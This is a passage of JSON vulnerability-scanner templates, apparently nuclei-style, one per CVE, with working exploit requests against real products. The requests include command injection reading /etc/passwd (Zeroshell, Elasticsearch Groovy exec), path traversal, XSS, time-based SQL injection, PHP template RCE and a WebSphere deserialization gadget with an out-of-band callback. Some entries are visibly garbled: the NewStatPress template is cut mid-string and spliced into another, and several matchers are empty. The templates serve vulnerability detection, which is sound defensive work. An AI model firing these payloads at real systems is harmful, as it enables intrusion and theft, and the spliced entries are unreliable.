script"],"condition":"and"}],"extractors":[{"type":"regex","regex":["[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"],"part":"body"}]}]},{"id":"CVE-2019-12725","info":{"name":"Zeroshell 3.9.0 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW="],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3911","info":{"name":"LabKey Server Community Edition <18.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11510","info":{"name":"Pulse Connect Secure SSL VPN Arbitrary File Read","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19134","info":{"name":"WordPress Hero Maps Premium <=2.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["foo\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7254","info":{"name":"eMerge E3 1.00-06 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?c=../../../../../../etc/passwd%00","{{BaseURL}}/badging/badge_print_v0.php?tpl=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12962","info":{"name":"LiveZilla Server 8.0.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mobile/index.php"],"headers":{"Accept-Language":";alert(document.domain)//"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var detectedLanguage = ';alert(document.domain)//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8446","info":{"name":"Jira Improper Authorization","severity":"medium"},"requests":[{"raw":["POST /rest/issueNav/1/issueTable HTTP/1.1\nHost: {{Hostname}}\nConnection: Close\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\nX-Atlassian-Token: no-check\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\n\n{'jql':'project in projectsLeadByUser(\"{{randstr}}\")'}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["the user does not exist"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12581","info":{"name":"Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/free_time_failed.cgi?err_msg="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","Please contact with administrator."],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9955","info":{"name":"Zyxel - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?mp_idx=%22;alert(%271%27);//"],"matchers":[{"type":"word","part":"body","words":["\";alert('1');//","Welcome"],"condition":"and"}]}]},{"id":"CVE-2019-9041","info":{"name":"ZZZCMS 1.6.1 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /search/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /search/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nkeys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","!contains(body_1, \"phpinfo\")","contains_all(body_2, \"phpinfo\",\"PHP Version\")"],"condition":"and"}]}]},{"id":"CVE-2019-0232","info":{"name":"Apache Tomcat `CGIServlet` enableCmdLineArguments - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /?&echo+{{sid}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{sid}}"]},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-0221","info":{"name":"Apache Tomcat - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/printenv.shtml?{{url_encode(payload)}}","{{BaseURL}}/ssi/printenv.shtml?{{url_encode(payload)}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["QUERY_STRING_UNESCAPED={{payload}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-3344","info":{"name":"Horde Groupware Unauthenticated Admin Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/horde/admin/user.php","{{BaseURL}}/admin/user.php"],"headers":{"Content-Type":"text/html"},"matchers-condition":"and","matchers":[{"type":"word","words":["Horde :: User Administration"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-2428","info":{"name":"Lotus Domino R5 and R6 WebMail - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/names.nsf/People?OpenView"],"matchers-condition":"and","matchers":[{"type":"regex","name":"domino-username","part":"body","regex":["(\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-3634","info":{"name":"SAP Web Application Server 6.x/7.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sap/bc/BSp/sap/menu/fameset.htm?sap--essioncmd=close&sapexiturl=https%3a%2f%2finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-2996","info":{"name":"SysAid Help Desk <15.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd","{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2755","info":{"name":"WordPress AB Google Map Travel <=3.4 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nPOST /wp-admin/admin.php?page=ab_map_options HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlat=%22%3E+%3Cscript%3E%2B-%2B-1-%2B-%2Balert%28document.domain%29%3C%2Fscript%3E&long=76.26730&lang=en&map_width=500&map_height=300&zoom=7&day_less_five_fare=2&day_more_five_fare=1.5&less_five_fare=3&more_five_fare=2.5&curr_format=%24&submit=Update+Settings\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"\")","contains(body_2, \"ab-google-map-travel\")"],"condition":"and"}]}]},{"id":"CVE-2015-8399","info":{"name":"Atlassian Confluence <5.8.17 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["confluence-init.properties","View Default Decorator"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4074","info":{"name":"Joomla! Helpdesk Pro plugin <1.4.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4127","info":{"name":"WordPress Church Admin <0.810 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/church-admin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Church Admin ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4668","info":{"name":"Xsuite <=2.4.4.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/openwin.php?redirurl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-2863","info":{"name":"Kaseya Virtual System Administrator - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/inc/supportLoad.asp?urlToLoad=http://oast.me","{{BaseURL}}/vsaPres/Web20/core/LocalProxy.ashx?url=http://oast.me"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-5471","info":{"name":"Swim Team <= v1.44.10777 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5461","info":{"name":"WordPress StageShow <5.0.9 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2015-8349","info":{"name":"SourceBans <2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2794","info":{"name":"DotNetNuke 07.04.00 - Administration Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Install/InstallWizard.aspx?__VIEWSTATE"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Administrative Information","Database Information"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4050","info":{"name":"Symfony - Authentication Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Credits"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1000012","info":{"name":"WordPress MyPixs <=0.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3897","info":{"name":"Bonita BPM Portal <6.5.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd","{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0:"]}]}]},{"id":"CVE-2015-2068","info":{"name":"Magento Server Mass Importer - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4062","info":{"name":"WordPress NewStatPress 0.9.8 - SQL Injection","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 20s\nGET /wp-admin/admin.php?where1=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body_2, \"newstatpress_page_nsp_search\")"],"condition":"and"}]}]},{"id":"CVE-2015-5688","info":{"name":"Geddy <13.0.8 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3224","info":{"name":"Ruby on Rails Web Console - Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/{{randstr}}"],"headers":{"X-Forwarded-For":"::1"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Rails.root:","Action Controller: Exception caught"],"condition":"and"},{"type":"word","part":"response","words":["X-Web-Console-Session-Id","data-remote-path=","data-session-id="],"case-insensitive":true,"condition":"or"}]}]},{"id":"CVE-2015-9312","info":{"name":"NewStatPress <=1.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?groupby1=checked%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29&page=nsp_search&newstatpress_action=search HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)&searchsubmit=Buscar&page=nsp_search HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, '') && contains(body_2, 'newstatpress')"],"condition":"and"}]}]},{"id":"CVE-2015-1000005","info":{"name":"WordPress Candidate Application Form <= 1.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9323","info":{"name":"404 to 301 <= 2.0.2 - Authenticated Blind SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/admin.php?page=i4t3-logs&orderby=(SELECT+*+FROM+(SELECT+SLEEP(7))XXX)--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"404-to-301\")"],"condition":"and"}]}]},{"id":"CVE-2015-6920","info":{"name":"WordPress sourceAFRICA <=0.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/sourceafrica/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["SourceAfrica","Tags:"],"condition":"and","case-insensitive":true}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1503","info":{"name":"IceWarp Mail Server <11.1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd","{{BaseURL}}/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7245","info":{"name":"D-Link DVG-N5402SP - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /cgibin/webproc HTTP/1.1\nHost: {{Hostname}}\n\ngetpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2015-2166","info":{"name":"Ericsson Drutt MSDP - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1427","info":{"name":"ElasticSearch - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /website/blog/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\n\n{\n \"name\": \"test\"\n}\n","POST /_search HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\n{\"size\":1, \"script_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"cat /etc/passwd\\\").getText()\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3035","info":{"name":"TP-LINK - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login/../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7780","info":{"name":"ManageEngine Firewall Analyzer <8.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3648","info":{"name":"ResourceSpace - Local File inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2080","info":{"name":"Eclipse Jetty <9.2.9.v20150224 - Sensitive Information Leakage","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}"],"headers":{"Referer":"\\x00"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Illegal character 0x0 in state"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2015-7450","info":{"name":"IBM WebSphere Java Object Deserialization - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\nSOAPAction: \"urn:AdminService\"\n\n\n\n\n\n\n\nrO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==\ngetUnsavedChanges\n{{ generate_java_gadget(\"dns\", \"{{interactsh-url}}\", \"base64-raw\")}}\nrO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=\n\n\n\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["SOAP-ENV:Server",""],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2015-1000010","info":{"name":"WordPress Simple Image Manipulator < 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2196","info":{"name":"WordPress Spider Calendar <=1.4.9 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout 10s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(body, \"{\\\"status\\\":true,\\\"data\\\"\")"],"condition":"and"}]}]},{"id":"CVE-2015-9480","info":{"name":"WordPress RobotCPA 5 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5531","info":{"name":"ElasticSearch <1.6.1 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["PUT /_snapshot/test HTTP/1.1\nHost: {{Hostname}}\n\n{\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"/usr/share/elasticsearch/repo/test\"\n }\n}\n","PUT /_snapshot/test2 HTTP/1.1\nHost: {{Hostname}}\n\n{\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"/usr/share/elasticsearch/repo/test/snapshot-backdata\"\n }\n}\n","GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ElasticsearchParseException","Failed to derive xcontent from","114, 111, 111, 116, 58"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2015-1880","info":{"name":"Fortinet FortiOS <=5.2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9414","info":{"name":"WordPress Symposium <=15.8.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wp-symposium/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WP Symposium","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4632","info":{"name":"Koha 3.20.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7377","info":{"name":"WordPress Pie-Register <2.0.19 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-6544","info":{"name":"Combodo iTop <2.2.0-2459 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-20067","info":{"name":"WP Attachment Export < 0.2.4 - Unrestricted File Download","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true","{{BaseURL}}/wp-admin/tools.php?content=&wp-attachment-export-download=true"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/xml\")","contains_all(body, \"title\",\"wp:author_id\",\"wp:author_email\")"],"condition":"and"}]}]},{"id":"CVE-2015-7297","info":{"name":"Joomla! Core SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2015-3337","info":{"name":"Elasticsearch - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2807","info":{"name":"Navis DocumentCloud <0.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/navis-documentcloud/readme.txt HTTP/1.1\nHost: 